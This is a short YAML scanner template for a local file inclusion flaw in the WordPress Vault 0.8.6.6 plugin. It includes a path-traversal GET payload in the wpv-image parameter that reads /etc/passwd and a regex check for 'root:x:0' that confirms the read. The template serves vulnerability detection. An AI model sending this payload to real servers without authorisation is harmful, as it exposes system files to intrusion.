product: WordPress
vName: WordPress Vault - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: WordPress Vault 0.8.6.6 is vulnerable to local file inclusion.
version: 0.8.6.6
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/40850
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
    verify:
      logic: and
      check:
        - regex:
            value:
              - 'root:x:0'
            logic: and
        - status: 200
